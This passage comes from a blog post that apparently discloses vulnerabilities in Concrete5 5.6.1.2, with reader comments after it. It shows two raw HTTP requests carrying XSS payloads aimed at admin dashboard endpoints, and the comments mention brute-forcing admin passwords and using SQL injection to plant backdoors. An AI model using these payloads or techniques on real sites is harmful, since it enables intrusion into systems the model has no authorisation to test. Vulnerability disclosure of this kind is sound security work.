POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/seo/excluded/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 87

SEO_EXCLUDE_WORDS='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&ccm-submit-button=Save
---< request >---

33. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/mail/importers/save_importer/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 210

miID=1&miEmail='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&miIsEnabled=0&miServer=asd&miUsername=asd&miPassword=asd&miEncryption=&miPort=asd&miConnectionMethod=POP&ccm-submit-mail-importer-form=Save
---< request >---

Let me know if you have any questions.

Enjoy ;)

2 comments:

  1. Have you reported these problems to Concrete5?
    I can't find them in their bug tracker:
    www.concrete5.org/developers/bugs/

    I understand all these vulnerabilities are possible to exploit only after successful authentication on admin account.
    What is the reason to attack by sql injection database, when you already have admin access to it (you are logged in as admin)?
    How can you exploit above xss vulnerabilities? I mean a real-attack scenario? I guess these are reflected ones?

    ReplyDelete
  2. 1. Yes, I sent them information: at 13.08.2012, at 27.11.2012 and at 15.01.2013
    about possible vulnerabilities. And because of ignoring it 'because its explotable from admin' - I decide to wrote a small tool to bruteforce admin password, and then show few examples of vulnerabilities.

    2. Depends. Try to check if you're able to make some CSRF attacks to.

    3. Real attack scenario of exploiting was presented in few places in web, for example at blackhat conference(s).

    4. What is the reason to attack by sqli - depends. Maybe if you want to add some backdoor and not set on page that you 'hacked it' maybe it's a good reason. Or maybe to make som other priviledge escalation attacks.

    ReplyDelete

What do You think...?